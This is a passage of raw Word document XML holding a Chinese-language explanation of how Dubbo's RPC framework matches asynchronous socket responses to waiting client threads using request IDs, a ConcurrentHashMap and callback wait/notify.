          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从发出请求到接收到结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来说是一个异步的，即对于当前线程来说，将请求发送出来，线程就可以往后执行了，至于服务端的结果，是服务端处理完成后，再以消息的形式发送给客户端的。于是这里出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个问题：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前线程怎么让它</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>暂停</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，等结果回来后，再向后执行？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正如前面所说，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通信是一个全双工的方式，如果有多个线程同时进行远程方法调用，这时建立在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>client server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之间的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>连接上会有很多双方发送的消息传递，前后顺序也可能是乱七八糟的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处理完结果后，将结果消息发送给</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>收到很多消息，怎么知道哪个消息结果是原先哪个线程调用的？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00DA54D7" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分析源代码，基本原理如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一个线程调用远程接口，生成一个唯一的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（比如一段随机字符串，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等），</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AtomicLong</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开始累计数字的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00B630AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>打包的方法调用信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（如调用的接口名称，方法名称，参数值列表等），和处理结果的回调对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，全部封装在一起，组成一个对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>向专门存放调用信息的全局</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>put(ID, object)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC0F59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>打包的方法调用信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>封装成一对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>connRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IoSession.write(connRequest)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>异步发送出去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前线程再使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法试图获取远程返回的结果，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内部，则使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取回调对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的锁，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再先检测是否已经获取到结果，如果没有，然后调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>wait()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法，释放</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上的锁，让当前线程处于等待状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
